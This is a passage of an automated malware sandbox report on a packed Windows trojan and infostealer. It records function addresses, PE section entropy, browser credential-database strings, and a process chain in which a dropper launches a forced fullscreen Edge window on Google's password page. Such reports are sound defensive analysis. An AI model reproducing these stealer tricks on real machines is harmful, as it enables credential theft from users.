Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4ED70 7_2_6CA4ED70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAAAD50 7_2_6CAAAD50
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA06E90 7_2_6CA06E90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C98AEC0 7_2_6C98AEC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA20EC0 7_2_6CA20EC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA60E20 7_2_6CA60E20
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1EE70 7_2_6CA1EE70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC8FB0 7_2_6CAC8FB0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C98EFB0 7_2_6C98EFB0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5EFF0 7_2_6CA5EFF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C980FE0 7_2_6C980FE0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C986F10 7_2_6C986F10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0F20 7_2_6CAC0F20
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA42F70 7_2_6CA42F70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9EEF40 7_2_6C9EEF40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA868E0 7_2_6CA868E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA0A820 7_2_6CA0A820
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D0820 7_2_6C9D0820
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA54840 7_2_6CA54840
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA109A0 7_2_6CA109A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA3A9A0 7_2_6CA3A9A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA409B0 7_2_6CA409B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA9C9E0 7_2_6CA9C9E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9B49F0 7_2_6C9B49F0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D6900 7_2_6C9D6900
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9B8960 7_2_6C9B8960
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9FEA80 7_2_6C9FEA80
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA38A30 7_2_6CA38A30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA2EA00 7_2_6CA2EA00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9FCA70 7_2_6C9FCA70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA20BA0 7_2_6CA20BA0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA86BE0 7_2_6CA86BE0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAAA480 7_2_6CAAA480
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9C64D0 7_2_6C9C64D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1A4D0 7_2_6CA1A4D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA0A430 7_2_6CA0A430
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E4420 7_2_6C9E4420
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C998460 7_2_6C998460
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9745B0 7_2_6C9745B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4A5E0 7_2_6CA4A5E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA0E5F0 7_2_6CA0E5F0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA20570 7_2_6CA20570
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D8540 7_2_6C9D8540
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA84540 7_2_6CA84540
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC8550 7_2_6CAC8550
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E2560 7_2_6C9E2560
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1E6E0 7_2_6CA1E6E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9A46D0 7_2_6C9A46D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9DE6E0 7_2_6C9DE6E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9DC650 7_2_6C9DC650
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9AA7D0 7_2_6C9AA7D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA00700 7_2_6CA00700
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C978090 7_2_6C978090
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5C0B0 7_2_6CA5C0B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9900B0 7_2_6C9900B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4C000 7_2_6CA4C000
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA48010 7_2_6CA48010
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9CE070 7_2_6C9CE070
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9801E0 7_2_6C9801E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA64130 7_2_6CA64130
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9F6130 7_2_6C9F6130
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E8140 7_2_6C9E8140
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA522A0 7_2_6CA522A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4E2B0 7_2_6CA4E2B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB062C0 7_2_6CB062C0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA58220 7_2_6CA58220
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4A210 7_2_6CA4A210
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA08260 7_2_6CA08260
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA18250 7_2_6CA18250
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9DE3B0 7_2_6C9DE3B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9B23A0 7_2_6C9B23A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D43E0 7_2_6C9D43E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9F2320 7_2_6C9F2320
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA9C360 7_2_6CA9C360
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA16370 7_2_6CA16370
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C988340 7_2_6C988340
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC2370 7_2_6CAC2370
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C982370 7_2_6C982370
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA41CE0 7_2_6CA41CE0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CABDCD0 7_2_6CABDCD0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C991C30 7_2_6C991C30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C983C40 7_2_6C983C40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAA9C40 7_2_6CAA9C40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C973D80 7_2_6C973D80
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC9D90 7_2_6CAC9D90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA51DC0 7_2_6CA51DC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E3D00 7_2_6C9E3D00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9A3EC0 7_2_6C9A3EC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA8DE10 7_2_6CA8DE10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB05E60 7_2_6CB05E60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CADBE70 7_2_6CADBE70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9A1F90 7_2_6C9A1F90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA2BFF0 7_2_6CA2BFF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA9DFC0 7_2_6CA9DFC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB03FC0 7_2_6CB03FC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAD7F20 7_2_6CAD7F20
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C975F30 7_2_6C975F30
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C90CBE8 appears 134 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C9194D0 appears 90 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C9A9B10 appears 73 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6CAB9F30 appears 31 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C9A3620 appears 72 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994770321038251
Source: file.exe Static PE information: Section: gmovqjaa ZLIB complexity 0.9943861573657365
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9994770321038251
Source: explorti.exe.0.dr Static PE information: Section: gmovqjaa ZLIB complexity 0.9943861573657365
Source: random[1].exe.6.dr Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: eb98fe5174.exe.6.dr Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: 53c7d901f1.exe.6.dr Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@98/516@20/12
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C937030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 7_2_6C937030
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Roaming\1000051000\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: eb98fe5174.exe, 00000007.00000003.2493810088.000000001D3B8000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJDGDHIDAKJJ.7.dr, Login Data.13.dr, Login Data.21.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe Virustotal: Detection: 56%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: eb98fe5174.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe "C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe "C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe "C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe"
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2064,i,2067255111273932546,8949113653420219710,262144 --disable-features=TranslateUI /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4612 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7040 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6416 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6416 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4132 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1160,i,17042684596641100279,13993029759771197311,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=2064,i,2036512315538271588,12735040485945945240,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe "C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe" Jump to behavior
